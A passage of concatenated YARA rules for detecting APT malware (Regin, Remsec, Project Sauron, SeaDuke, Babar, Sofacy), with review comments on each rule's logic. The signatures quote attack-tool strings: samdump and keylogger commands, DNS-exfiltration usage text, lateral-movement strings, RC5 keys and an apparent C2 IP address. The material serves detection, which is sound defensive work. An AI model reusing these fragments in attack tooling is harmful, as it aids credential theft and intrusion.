        description = "Auto-generated rule - file hiddenmod_hookdisk_and_kdbg_8949d000.bin"
        author = "@MalwrSignatures"
        date = "26.11.14"
        hash = "a7b285d4b896b66fce0ebfcd15db53b3a74a0400"

    strings:
        $s0 = "\\SYSTEMROOT\\system32\\lsass.exe" fullword wide
        $s1 = "atapi.sys" fullword wide
        $s2 = "disk.sys" fullword wide
        $s3 = "IoGetRelatedDeviceObject" fullword ascii
        $s4 = "HAL.dll" fullword ascii
        $s5 = "\\Registry\\Machine\\System\\CurrentControlSet\\Services" fullword ascii
        $s6 = "PsGetCurrentProcessId" fullword ascii
        $s7 = "KeGetCurrentIrql" fullword ascii
        $s8 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager" wide
        $s9 = "KeSetImportanceDpc" fullword ascii
        $s10 = "KeQueryPerformanceCounter" fullword ascii
        $s14 = "KeInitializeEvent" fullword ascii
        $s15 = "KeDelayExecutionThread" fullword ascii
        $s16 = "KeInitializeTimerEx" fullword ascii
        $s18 = "PsLookupProcessByProcessId" fullword ascii
        $s19 = "ExReleaseFastMutexUnsafe" fullword ascii
        $s20 = "ExAcquireFastMutexUnsafe" fullword ascii

    condition:
        all of them and filesize < 40KB and filesize > 30KB
}

/*
 * Regin backdoor module with the fe ba dc fe magic at offset 0 (the same
 * marker apt_regin_vfs-style containers use), every $s* string, and a
 * 160-200KB size window.
 * NOTE(review): "mntoskrnl.exe" ($s3) reads like a string-extraction artifact
 * of a longer path; it is kept as published because the sample hash matched.
 */
rule Regin_Sample_3
{
    meta:
        description = "Detects Regin Backdoor sample fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129"
        author = "@Malwrsignatures"
        date = "27.11.14"
        hash = "fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129"

    strings:
        $hd = { fe ba dc fe }
        $s0 = "Service Pack x" fullword wide
        $s1 = "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" fullword wide
        $s2 = "\\REGISTRY\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HotFix" fullword wide
        $s3 = "mntoskrnl.exe" fullword wide
        $s4 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager\\Memory Management" fullword wide
        $s5 = "Memory location: 0x%p, size 0x%08x" wide fullword
        $s6 = "Service Pack" fullword wide
        $s7 = ".sys" fullword wide
        $s8 = ".dll" fullword wide
        $s10 = "\\REGISTRY\\Machine\\Software\\Microsoft\\Updates" fullword wide
        $s11 = "IoGetRelatedDeviceObject" fullword ascii
        $s12 = "VMEM.sys" fullword ascii
        $s13 = "RtlGetVersion" fullword wide
        $s14 = "ntkrnlpa.exe" fullword ascii

    condition:
        ( $hd at 0 ) and all of ($s*) and filesize > 160KB and filesize < 200KB
}

/*
 * Auto-generated rule covering two Regin NDIS-layer drivers (30-40KB).
 * NOTE(review): apart from "MaximumPortsServiced" / "ConnectMultiplePorts"
 * these are ordinary kernel imports and registry paths; the size window does
 * most of the filtering, so verify hits against the reference hashes.
 */
rule Regin_Sample_Set_1
{
    meta:
        description = "Auto-generated rule - file SHF-000052 and ndisips.sys"
        author = "@MalwrSignatures"
        date = "26.11.14"
        hash1 = "8487a961c8244004c9276979bb4b0c14392fc3b8"
        hash2 = "bcf3461d67b39a427c83f9e39b9833cfec977c61"

    strings:
        $s0 = "HAL.dll" fullword ascii
        $s1 = "IoGetDeviceObjectPointer" fullword ascii
        $s2 = "MaximumPortsServiced" fullword wide
        $s3 = "KeGetCurrentIrql" fullword ascii
        $s4 = "ntkrnlpa.exe" fullword ascii
        $s5 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager" wide
        $s6 = "ConnectMultiplePorts" fullword wide
        $s7 = "\\SYSTEMROOT" fullword wide
        $s8 = "IoWriteErrorLogEntry" fullword ascii
        $s9 = "KeQueryPerformanceCounter" fullword ascii
        $s10 = "KeServiceDescriptorTable" fullword ascii
        $s11 = "KeRemoveEntryDeviceQueue" fullword ascii
        $s12 = "SeSinglePrivilegeCheck" fullword ascii
        $s13 = "KeInitializeEvent" fullword ascii
        $s14 = "IoBuildDeviceIoControlRequest" fullword ascii
        $s15 = "KeRemoveDeviceQueue" fullword ascii
        $s16 = "IofCompleteRequest" fullword ascii
        $s17 = "KeInitializeSpinLock" fullword ascii
        $s18 = "MmIsNonPagedSystemAddressValid" fullword ascii
        $s19 = "IoCreateDevice" fullword ascii
        $s20 = "KefReleaseSpinLockFromDpcLevel" fullword ascii

    condition:
        all of them and filesize < 40KB and filesize > 30KB
}

/*
 * Two Regin backdoor builds (360-450KB) sharing the fe ba dc fe magic at
 * offset 0, network-adapter registry paths, and the disp.dll/imagehlp.dll
 * dispatcher references. All $s* strings are required.
 */
rule Regin_Sample_Set_2
{
    meta:
        description = "Detects Regin Backdoor sample 4139149552b0322f2c5c993abccc0f0d1b38db4476189a9f9901ac0d57a656be and e420d0cf7a7983f78f5a15e6cb460e93c7603683ae6c41b27bf7f2fa34b2d935"
        author = "@MalwrSignatures"
        date = "27.11.14"
        hash1 = "4139149552b0322f2c5c993abccc0f0d1b38db4476189a9f9901ac0d57a656be"
        hash2 = "e420d0cf7a7983f78f5a15e6cb460e93c7603683ae6c41b27bf7f2fa34b2d935"

    strings:
        $hd = { fe ba dc fe }
        $s0 = "d%ls%ls" fullword wide
        $s1 = "\\\\?\\UNC" fullword wide
        $s2 = "Software\\Microsoft\\Windows\\CurrentVersion" fullword wide
        $s3 = "\\\\?\\UNC\\" fullword wide
        $s4 = "SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}" fullword wide
        $s5 = "System\\CurrentControlSet\\Services\\Tcpip\\Linkage" wide fullword
        $s6 = "\\\\.\\Global\\%s" fullword wide
        $s7 = "temp" fullword wide
        $s8 = "\\\\.\\%s" fullword wide
        $s9 = "Memory location: 0x%p, size 0x%08x" fullword wide
        $s10 = "sscanf" fullword ascii
        $s11 = "disp.dll" fullword ascii
        // IPv6 / IPv4 scanf-style formats.
        $s12 = "%x:%x:%x:%x:%x:%x:%x:%x%c" fullword ascii
        $s13 = "%d.%d.%d.%d%c" fullword ascii
        $s14 = "imagehlp.dll" fullword ascii
        $s15 = "%hd %d" fullword ascii

    condition:
        ( $hd at 0 ) and all of ($s*) and filesize < 450KB and filesize > 360KB
}

/*
 * Regin "Legspin" interactive backdoor module: MZ at 0 and all eight command /
 * output strings.
 */
rule apt_regin_legspin
{
    meta:
        copyright = "Kaspersky Lab"
        description = "Rule to detect Regin's Legspin module"
        version = "1.0"
        last_modified = "2015-01-22"
        reference = "https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-legspin/"
        md5 = "29105f46e4d33f66fee346cfd099d1cc"

    strings:
        $mz = "MZ"
        $a1 = "sharepw"
        $a2 = "reglist"
        $a3 = "logdump"
        $a4 = "Name:" wide
        $a5 = "Phys Avail:"
        $a6 = "cmd.exe" wide
        $a7 = "ping.exe" wide
        $a8 = "millisecs"

    condition:
        ($mz at 0) and all of ($a*)
}

/*
 * Regin "Hopscotch" lateral-movement module: MZ at 0 and all eight strings
 * (IPC$ authentication, remote service copy, named-pipe connect, DH exchange).
 */
rule apt_regin_hopscotch
{
    meta:
        copyright = "Kaspersky Lab"
        description = "Rule to detect Regin's Hopscotch module"
        version = "1.0"
        last_modified = "2015-01-22"
        reference = "https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-legspin/"
        md5 = "6c34031d7a5fc2b091b623981a8ae61c"

    strings:
        $mz = "MZ"
        $a1 = "AuthenticateNetUseIpc"
        $a2 = "Failed to authenticate to"
        $a3 = "Failed to disconnect from"
        $a4 = "%S\\ipc$" wide
        $a5 = "Not deleting..."
        $a6 = "CopyServiceToRemoteMachine"
        $a7 = "DH Exchange failed"
        $a8 = "ConnectToNamedPipes"

    condition:
        ($mz at 0) and all of ($a*)
}

/*
 * Regin 32-bit stage-1 loader: MZ at 0, any of three 8-byte constants, and a
 * raw 300000-byte size cap.
 */
rule apt_regin_2011_32bit_stage1
{
    meta:
        copyright = "Kaspersky Lab"
        description = "Rule to detect Regin 32 bit stage 1 loaders"
        version = "1.0"
        last_modified = "2014-11-18"

    strings:
        $key1 = { 331015EA261D38A7 }
        $key2 = { 9145A98BA37617DE }
        $key3 = { EF745F23AA67243D }
        $mz = "MZ"

    condition:
        ($mz at 0) and any of ($key*) and filesize < 300000
}

/*
 * Two 16-byte Regin RC5 keys matched anywhere, with no header or size anchor -
 * presumably so the rule also fires on memory and extracted VFS contents.
 * Both blobs are 16 random-looking bytes, so accidental hits should be rare.
 */
rule apt_regin_rc5key
{
    meta:
        copyright = "Kaspersky Lab"
        description = "Rule to detect Regin RC5 decryption keys"
        version = "1.0"
        last_modified = "2014-11-18"

    strings:
        $key1 = { 73 23 1F 43 93 E1 9F 2F 99 0C 17 81 5C FF B4 01 }
        $key2 = { 10 19 53 2A 11 ED A3 74 3F C3 72 3F 9D 94 3D 78 }

    condition:
        any of ($key*)
}

/*
 * Regin virtual file system containers, identified purely by one of four
 * 11-byte headers at offset 0.
 */
rule apt_regin_vfs
{
    meta:
        copyright = "Kaspersky Lab"
        author = "Kaspersky Lab"
        description = "Rule to detect Regin VFSes"
        version = "1.0"
        last_modified = "2014-11-18"

    strings:
        $a1 = { 00 02 00 08 00 08 03 F6 D7 F3 52 }
        $a2 = { 00 10 F0 FF F0 FF 11 C7 7F E8 52 }
        $a3 = { 00 04 00 10 00 10 03 C2 D3 1C 93 }
        $a4 = { 00 04 00 10 C8 00 04 C8 93 06 D8 }

    condition:
        ($a1 at 0) or ($a2 at 0) or ($a3 at 0) or ($a4 at 0)
}

/*
 * Regin disp.dll dispatcher: MZ at 0 and all five strings.
 */
rule apt_regin_dispatcher_disp_dll
{
    meta:
        copyright = "Kaspersky Lab"
        author = "Kaspersky Lab"
        description = "Rule to detect Regin disp.dll dispatcher"
        version = "1.0"
        last_modified = "2014-11-18"

    strings:
        $mz = "MZ"
        $string1 = "shit"
        $string2 = "disp.dll"
        $string3 = "255.255.255.255"
        $string4 = "StackWalk64"
        $string5 = "imagehlp.dll"

    condition:
        ($mz at 0) and (all of ($string*))
}

/*
 * Regin 64-bit stage-1 loader (two known file names in meta): MZ at 0, the
 * PRIVHEAD marker, raw physical-drive access and ZwDeviceIoControlFile, under
 * 100000 bytes.
 */
rule apt_regin_2013_64bit_stage1
{
    meta:
        copyright = "Kaspersky Lab"
        description = "Rule to detect Regin 64 bit stage 1 loaders"
        version = "1.0"
        last_modified = "2014-11-18"
        filename = "wshnetc.dll"
        md5 = "bddf5afbea2d0eed77f2ad4e9a4f044d"
        filename = "wsharp.dll"
        md5 = "c053a0a3f1edcbbfc9b51bc640e808ce"

    strings:
        $mz = "MZ"
        $a1 = "PRIVHEAD"
        $a2 = "\\\\.\\PhysicalDrive%d"
        $a3 = "ZwDeviceIoControlFile"

    condition:
        ($mz at 0) and (all of ($a*)) and filesize < 100000
}

/*
 * Remsec code-pattern rules. None has a header or size anchor: they match the
 * raw opcode sequence wherever it occurs (files, dumps, memory).
 *
 * 32-bit decode loop:
 *   31 06          xor [esi], eax
 *   83 C6 04       add esi, 4
 *   D1 E8          shr eax, 1
 *   73 05          jae +5
 *   35 01 00 00 D0 xor eax, 0D0000001h
 *   E2 F0          loop back
 */
rule remsec_executable_blob_32
{
    meta:
        author = "remsec"

    strings:
        $code = { 31 06 83 C6 04 D1 E8 73 05 35 01 00 00 D0 E2 F0 }

    condition:
        all of them
}

/*
 * 64-bit form of the same loop (48 83 C6 04 = add rsi, 4; loop offset EF).
 */
rule remsec_executable_blob_64
{
    meta:
        author = "remsec"

    strings:
        $code = { 31 06 48 83 C6 04 D1 E8 73 05 35 01 00 00 D0 E2 EF }

    condition:
        all of them
}

/*
 * Blob parser: a branch, then a cmp against the constant C1 02 AA 02 (written
 * as 02 AA 02 C1 in memory order) with 32-bit / REX-prefixed alternatives,
 * then a load from register+6.
 */
rule remsec_executable_blob_parser
{
    meta:
        author = "remsec"

    strings:
        $code = { ( 0F 82 ?? ?? 00 00 | 72 ?? ) ( 81 | 41 81 ) ( 3? | 3C 24 | 7D 00 ) 02 AA 02 C1 ( 0F 85 ?? ?? 00 00 | 75 ?? ) ( 8B | 41 8B | 44 8B | 45 8B ) ( 4? | 5? | 6? | 7? | ?4 24 | ?C 24 ) 06 }

    condition:
        all of them
}

/*
 * Obfuscated API name: XOR-ing each byte with 0xFF gives "nepO" "corP" "sse\0",
 * i.e. "OpenProcess" with each dword byte-reversed.
 */
rule remsec_encrypted_api
{
    meta:
        author = "remsec"

    strings:
        $open_process = { 91 9A 8F B0 9C 90 8D AF 8C 8C 9A FF }

    condition:
        all of them
}

/*
 * Packer "u": imul/add/mul/shr/imul/sub sequence with constants 0xAB, 0x2BCD,
 * 0xCF85, with REX-prefixed alternatives for 64-bit builds.
 */
rule remsec_packer_u
{
    meta:
        author = "remsec"

    strings:
        $code = { 69 ( C? | D? | E? | F? ) AB 00 00 00 ( 81 | 41 81 ) C? CD 2B 00 00 ( F7 | 41 F7 ) E? ( C1 | 41 C1 ) E? 0D ( 69 | 45 69 ) ( C? | D? | E? | F? ) 85 CF 00 00 ( 29 | 41 29 | 44 29 | 45 29 | 2B | 41 2B | 44 2B | 45 2B ) }

    condition:
        all of them
}

/*
 * Packer "B": 64-bit stack-frame setup (lea / mov [rsp+..]) ending in an
 * indirect call and the constant 0x3A000000.
 */
rule remsec_packer_B
{
    meta:
        author = "remsec"

    strings:
        $code = { 00 00 48 8D ( 45 ?? | 84 24 ?? ?? 00 00 ) ( 44 88 6? 24 ?? | C6 44 24 ?? 00 ) 48 89 44 24 ?? 48 8D ( 45 ?? | 84 24 ?? ?? 00 00 ) C7 44 24 ?? 0? 00 00 00 2B ?8 48 89 ?C 24 ?? 44 89 6? 24 ?? 83 C? 08 89 ?C 24 ?? ( FF | 41 FF ) D? ( 05 | 8D 88 ) 00 00 00 3A }

    condition:
        all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/

/*
 * Project Sauron LUA tooling scripts. Any single one of the 14 script
 * fragments fires; there is no file-type or size anchor, so this also
 * applies to text / script files and memory.
 */
rule APT_Project_Sauron_Scripts
{
    meta:
        description = "Detects scripts (mostly LUA) from Project Sauron report by Kaspersky"
        author = "Florian Roth"
        reference = "https://goo.gl/eFoP4A"
        date = "2016-08-08"

    strings:
        $x1 = "local t = w.exec2str(\"regedit "
        $x2 = "local r = w.exec2str(\"cat"
        $x3 = "ap*.txt link*.txt node*.tun VirtualEncryptedNetwork.licence"
        $x4 = "move O FakeVirtualEncryptedNetwork.dll"
        $x5 = "sinfo | basex b 32url | dext l 30"
        $x6 = "w.exec2str(execStr)"
        $x7 = "netnfo irc | basex b 32url"
        $x8 = "w.exec(\"wfw status\")"
        $x9 = "exec(\"samdump\")"
        $x10 = "cat VirtualEncryptedNetwork.ini|grep"
        $x11 = "if string.lower(k) == \"securityproviders\" then"
        $x12 = "exec2str(\"plist b | grep netsvcs\")"
        $x13 = ".*account.*|.*acct.*|.*domain.*|.*login.*|.*member.*"
        $x14 = "SAURON_KBLOG_KEY ="

    condition:
        1 of them
}

/*
 * Project Sauron "arping" module: all three usage-text lines.
 */
rule APT_Project_Sauron_arping_module
{
    meta:
        description = "Detects strings from arping module - Project Sauron report by Kaspersky"
        author = "Florian Roth"
        reference = "https://goo.gl/eFoP4A"
        date = "2016-08-08"

    strings:
        $s1 = "Resolve hosts that answer"
        $s2 = "Print only replying Ips"
        $s3 = "Do not display MAC addresses"

    condition:
        all of them
}

/*
 * Project Sauron "kblogi" keylogger module: the injection usage line alone is
 * enough; otherwise any two of the three strings.
 */
rule APT_Project_Sauron_kblogi_module
{
    meta:
        description = "Detects strings from kblogi module - Project Sauron report by Kaspersky"
        author = "Florian Roth"
        reference = "https://goo.gl/eFoP4A"
        date = "2016-08-08"

    strings:
        $x1 = "Inject using process name or pid. Default"
        $s2 = "Convert mode: Read log from file and convert to text"
        $s3 = "Maximum running time in seconds"

    condition:
        $x1 or 2 of them
}

/*
 * Project Sauron "basex" encoder module: the alphabet list alone, or any two of
 * three. "This cruft" also appears in netcat-family tools (see
 * Hacktool_This_Cruft below), so on its own it is not Sauron-specific.
 */
rule APT_Project_Sauron_basex_module
{
    meta:
        description = "Detects strings from basex module - Project Sauron report by Kaspersky"
        author = "Florian Roth"
        reference = "https://goo.gl/eFoP4A"
        date = "2016-08-08"

    strings:
        $x1 = "64, 64url, 32, 32url or 16."
        $s2 = "Force decoding when input is invalid/corrupt"
        $s3 = "This cruft"

    condition:
        $x1 or 2 of them
}

/*
 * Project Sauron "dext" DNS-exfiltration helper: any two of four usage strings
 * (again "This cruft" should not be the only evidence relied on).
 */
rule APT_Project_Sauron_dext_module
{
    meta:
        description = "Detects strings from dext module - Project Sauron report by Kaspersky"
        author = "Florian Roth"
        reference = "https://goo.gl/eFoP4A"
        date = "2016-08-08"

    strings:
        $x1 = "Assemble rows of DNS names back to a single string of data"
        $x2 = "removes checks of DNS names and lengths (during split)"
        $x3 = "Randomize data lengths (length/2 to length)"
        $x4 = "This cruft"

    condition:
        2 of them
}

/*
 * Low-score (60) hacktool indicator: the "This cruft" usage string in a PE
 * under 200KB. Fires on netcat / cryptcat builds too, by design.
 */
rule Hacktool_This_Cruft
{
    meta:
        description = "Detects string 'This cruft' often used in hack tools like netcat or cryptcat and also mentioned in Project Sauron report"
        author = "Florian Roth"
        reference = "https://goo.gl/eFoP4A"
        date = "2016-08-08"
        score = 60

    strings:
        $x1 = "This cruft" fullword

    condition:
        ( uint16(0) == 0x5a4d and filesize < 200KB and $x1 )
}

/*
    Yara Rule Set
    Author: FLorian Roth
    Date: 2016-08-09
    Identifier: Project Sauron - my own ruleset
*/

/* Rule Set ----------------------------------------------------------------- */

/*
 * Sauron module posing as "Network Configuration Locator" (ncnfloc.dll): PE
 * under 200KB with both names and one opcode fragment, or everything present
 * regardless of header/size.
 */
rule APT_Project_Sauron_Custom_M1
{
    meta:
        description = "Detects malware from Project Sauron APT"
        author = "FLorian Roth"
        reference = "https://goo.gl/eFoP4A"
        date = "2016-08-09"
        hash1 = "9572624b6026311a0e122835bcd7200eca396802000d0777dba118afaaf9f2a9"

    strings:
        $s1 = "ncnfloc.dll" fullword wide
        $s4 = "Network Configuration Locator" fullword wide
        $op0 = { 80 75 6e 85 c0 79 6a 66 41 83 38 0a 75 63 0f b7 } /* Opcode */
        $op1 = { 80 75 29 85 c9 79 25 b9 01 } /* Opcode */
        $op2 = { 2b d8 48 89 7c 24 38 44 89 6c 24 40 83 c3 08 89 } /* Opcode */

    condition:
        ( uint16(0) == 0x5a4d and filesize < 200KB and ( all of ($s*) ) and 1 of ($op*) )
        or ( all of them )
}

/*
 * Sauron module referencing the "\*\3vpn" path: PE under 400KB with the path
 * string and all three opcode fragments.
 */
rule APT_Project_Sauron_Custom_M2
{
    meta:
        description = "Detects malware from Project Sauron APT"
        author = "FLorian Roth"
        reference = "https://goo.gl/eFoP4A"
        date = "2016-08-09"
        hash1 = "30a824155603c2e9d8bfd3adab8660e826d7e0681e28e46d102706a03e23e3a8"

    strings:
        $s2 = "\\*\\3vpn" fullword ascii
        $op0 = { 55 8b ec 83 ec 0c 53 56 33 f6 39 75 08 57 89 75 } /* Opcode */
        $op1 = { 59 59 c3 8b 65 e8 ff 75 88 ff 15 50 20 40 00 ff } /* Opcode */
        $op2 = { 8b 4f 06 85 c9 74 14 83 f9 12 0f 82 a7 } /* Opcode */

    condition:
        ( uint16(0) == 0x5a4d and filesize < 400KB and ( all of ($s*) ) and all of ($op*) )
}

/*
 * Sauron module still carrying the placeholder name "ExampleProject.dll":
 * PE under 1000KB, the name and all three opcode fragments.
 */
rule APT_Project_Sauron_Custom_M3
{
    meta:
        description = "Detects malware from Project Sauron APT"
        author = "FLorian Roth"
        reference = "https://goo.gl/eFoP4A"
        date = "2016-08-09"
        hash1 = "a4736de88e9208eb81b52f29bab9e7f328b90a86512bd0baadf4c519e948e5ec"

    strings:
        $s1 = "ExampleProject.dll" fullword ascii
        $op0 = { 8b 4f 06 85 c9 74 14 83 f9 13 0f 82 ba } /* Opcode */
        $op1 = { ff 15 34 20 00 10 85 c0 59 a3 60 30 00 10 75 04 } /* Opcode */
        $op2 = { 55 8b ec ff 4d 0c 75 09 ff 75 08 ff 15 00 20 00 } /* Opcode */

    condition:
        ( uint16(0) == 0x5a4d and filesize < 1000KB and ( all of ($s*) ) and all of ($op*) )
}

/*
 * Sauron module posing as "XPS Manager" (xpsmngr.dll): PE under 90KB with both
 * names and one opcode fragment, or everything present.
 */
rule APT_Project_Sauron_Custom_M4
{
    meta:
        description = "Detects malware from Project Sauron APT"
        author = "FLorian Roth"
        reference = "https://goo.gl/eFoP4A"
        date = "2016-08-09"
        hash1 = "e12e66a6127cfd2cbb42e6f0d57c9dd019b02768d6f1fb44d91f12d90a611a57"

    strings:
        $s1 = "xpsmngr.dll" fullword wide
        $s2 = "XPS Manager" fullword wide
        $op0 = { 89 4d e8 89 4d ec 89 4d f0 ff d2 3d 08 00 00 c6 } /* Opcode */
        $op1 = { 55 8b ec ff 4d 0c 75 09 ff 75 08 ff 15 04 20 5b } /* Opcode */
        $op2 = { 8b 4f 06 85 c9 74 14 83 f9 13 0f 82 b6 } /* Opcode */

    condition:
        ( uint16(0) == 0x5a4d and filesize < 90KB and ( all of ($s*) ) and 1 of ($op*) )
        or ( all of them )
}

/*
 * Sauron module posing as "Remote Security Engine" (rseceng.dll). $op1/$op2
 * are the same fragments used in Custom_M1.
 */
rule APT_Project_Sauron_Custom_M6
{
    meta:
        description = "Detects malware from Project Sauron APT"
        author = "FLorian Roth"
        reference = "https://goo.gl/eFoP4A"
        date = "2016-08-09"
        hash1 = "3782b63d7f6f688a5ccb1b72be89a6a98bb722218c9f22402709af97a41973c8"

    strings:
        $s1 = "rseceng.dll" fullword wide
        $s2 = "Remote Security Engine" fullword wide
        $op0 = { 8b 0d d5 1d 00 00 85 c9 0f 8e a2 } /* Opcode */
        $op1 = { 80 75 6e 85 c0 79 6a 66 41 83 38 0a 75 63 0f b7 } /* Opcode */
        $op2 = { 80 75 29 85 c9 79 25 b9 01 } /* Opcode */

    condition:
        ( uint16(0) == 0x5a4d and filesize < 200KB and ( all of ($s*) ) and 1 of ($op*) )
        or ( all of them )
}

/*
 * Sauron security-package module posing as AOL's MSAOSSPC.dll (two builds).
 * PE under 200KB and either 3 of all $s* strings with 3 opcode fragments, or
 * one $sx* plus one $sa* string.
 * Notes:
 *  - $sa4 and $sa5 are byte-identical, so when that text is present they count
 *    twice toward "3 of ($s*)".
 *  - The second branch needs only "Default user" (or the typo string) plus one
 *    AOL/MSAOSSPC name. If a legitimate library carrying these AOL version
 *    strings exists in your estate, test it against this rule first.
 */
rule APT_Project_Sauron_Custom_M7
{
    meta:
        description = "Detects malware from Project Sauron APT"
        author = "FLorian Roth"
        reference = "https://goo.gl/eFoP4A"
        date = "2016-08-09"
        hash1 = "6c8c93069831a1b60279d2b316fd36bffa0d4c407068dbef81b8e2fe8fd8e8cd"
        hash2 = "7cc0bf547e78c8aaf408495ceef58fa706e6b5d44441fefdce09d9f06398c0ca"

    strings:
        $sx1 = "Default user" fullword wide
        $sx2 = "Hincorrect header check" fullword ascii /* Typo */
        $sa1 = "MSAOSSPC.dll" fullword ascii
        $sa2 = "MSAOSSPC.DLL" fullword wide
        $sa3 = "MSAOSSPC" fullword wide
        $sa4 = "AOL Security Package" fullword wide
        $sa5 = "AOL Security Package" fullword wide
        $sa6 = "AOL Client for 32 bit platforms" fullword wide
        $op0 = { 8b ce 5b e9 4b ff ff ff 55 8b ec 51 53 8b 5d 08 } /* Opcode */
        $op1 = { e8 0a fe ff ff 8b 4d 14 89 46 04 89 41 04 8b 45 } /* Opcode */
        $op2 = { e9 29 ff ff ff 83 7d fc 00 0f 84 cf 0a 00 00 8b } /* Opcode */
        $op3 = { 83 f8 0c 0f 85 3a 01 00 00 44 2b 41 6c 41 8b c9 } /* Opcode */
        $op4 = { 44 39 57 0c 0f 84 d6 0c 00 00 44 89 6f 18 45 89 } /* Opcode */
        $op5 = { c1 ed 02 83 c6 fe e9 68 fe ff ff 44 39 57 08 75 } /* Opcode */

    condition:
        uint16(0) == 0x5a4d and filesize < 200KB
        and (
            ( 3 of ($s*) and 3 of ($op*) )
            or ( 1 of ($sx*) and 1 of ($sa*) )
        )
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/ import "pe" rule Scieron { meta: author = "Symantec Security Response" ref = "http://www.symantec.com/connect/tr/blogs/scarab-attackers-took-aim-select-russian-targets-2012" date = "22.01.15" strings: // .text:10002069 66 83 F8 2C cmp ax, ',' // .text:1000206D 74 0C jz short loc_1000207B // .text:1000206F 66 83 F8 3B cmp ax, ';' // .text:10002073 74 06 jz short loc_1000207B // .text:10002075 66 83 F8 7C cmp ax, '|' // .text:10002079 75 05 jnz short loc_10002080 $code1 = {66 83 F? 2C 74 0C 66 83 F? 3B 74 06 66 83 F? 7C 75 05} // .text:10001D83 83 F8 09 cmp eax, 9 ; switch 10 cases // .text:10001D86 0F 87 DB 00 00 00 ja loc_10001E67 ; jumptable 10001D8C default case // .text:10001D8C FF 24 85 55 1F 00+ jmp ds:off_10001F55[eax*4] ; switch jump $code2 = {83 F? 09 0F 87 ?? 0? 00 00 FF 24} $str1 = "IP_PADDING_DATA" wide ascii $str2 = "PORT_NUM" wide ascii condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule SeaDuke_Sample { meta: description = "SeaDuke Malware - file 3eb86b7b067c296ef53e4857a74e09f12c2b84b666fc130d1f58aec18bc74b0d" author = "Florian Roth" reference = "http://goo.gl/MJ0c2M" date = "2015-07-14" score = 70 hash = "d2e570129a12a47231a1ecb8176fa88a1bf415c51dabd885c513d98b15f75d4e" strings: $s0 = "bpython27.dll" fullword ascii $s1 = "email.header(" fullword ascii /* PEStudio Blacklist: strings */ $s2 = "LogonUI.exe" fullword wide /* PEStudio Blacklist: strings */ $s3 = "Crypto.Cipher.AES(" fullword ascii /* PEStudio Blacklist: strings */ $s4 = "mod is NULL - %s" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 4000KB and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
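*/

// "pe" is imported by this concatenated rule set as a whole; none of the rules
// in this section reference pe.* fields.
import "pe"

/*
 * Babar (SNOWGLOBE) implant. MZ at 0 and under 1MB, then either one of the
 * highly specific $z* strings (PDB path, typo'd UA, "Failled") together with
 * one $x* string, or three of the command-line templates ($s*) with four of
 * the $x* strings. The $x* set is generic on its own and only narrows the
 * other two groups.
 */
rule SNOWGLOBE_Babar_Malware
{
    meta:
        description = "Detects the Babar Malware used in the SNOWGLOBE attacks - file babar.exe"
        author = "Florian Roth"
        reference = "http://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france"
        date = "2015/02/18"
        hash = "27a0a98053f3eed82a51cdefbdfec7bb948e1f36"
        score = 80

    strings:
        $mz = { 4d 5a }

        // Specific: build path, malformed UA ("MSI 6.0"), misspelled error text.
        $z0 = "admin\\Desktop\\Babar64\\Babar64\\obj\\DllWrapper" ascii fullword
        $z1 = "User-Agent: Mozilla/4.0 (compatible; MSI 6.0;" ascii fullword
        $z2 = "ExecQueryFailled!" fullword ascii
        $z3 = "NBOT_COMMAND_LINE" fullword
        $z4 = "!!!EXTRACT ERROR!!!File Does Not Exists-->[%s]" fullword

        // Command templates and an SDDL-formatted ACE list.
        $s1 = "/s /n %s \"%s\"" fullword ascii
        $s2 = "%%WINDIR%%\\%s\\%s" fullword ascii
        $s3 = "/c start /wait " fullword ascii
        $s4 = "(D;OICI;FA;;;AN)(A;OICI;FA;;;BG)(A;OICI;FA;;;SY)(A;OICI;FA;;;LS)" ascii

        // Generic supporting strings.
        $x1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\" fullword ascii
        $x2 = "%COMMON_APPDATA%" fullword ascii
        $x4 = "CONOUT$" fullword ascii
        $x5 = "cmd.exe" fullword ascii
        $x6 = "DLLPATH" fullword ascii

    condition:
        ( $mz at 0 ) and filesize < 1MB
        and (
            ( 1 of ($z*) and 1 of ($x*) )
            or ( 3 of ($s*) and 4 of ($x*) )
        )
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

/*
 * Sofacy X-Tunnel (Bundestag). Header must be MZ (0x5a4d) or the OLE compound
 * file magic (bytes D0 CF read little-endian as 0xCFD0). Then any of: the
 * XAPS project path, both "variant1" strings, both "variant2" strings, or six
 * of the $mix* strings. $mix4 repeats $variant22, and $mix5/$mix8 are generic,
 * so the six-of-ten branch leans on the C2 address, OpenSSL banner and
 * broken-English messages.
 */
rule apt_sofacy_xtunnel
{
    meta:
        author = "Claudio Guarnieri"
        description = "Sofacy Malware - German Bundestag"
        score = 75

    strings:
        $xaps = ":\\PROJECT\\XAPS_"

        $variant11 = "XAPS_OBJECTIVE.dll"
        $variant12 = "start"

        $variant21 = "User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0"
        $variant22 = "is you live?"

        $mix1 = "176.31.112.10"
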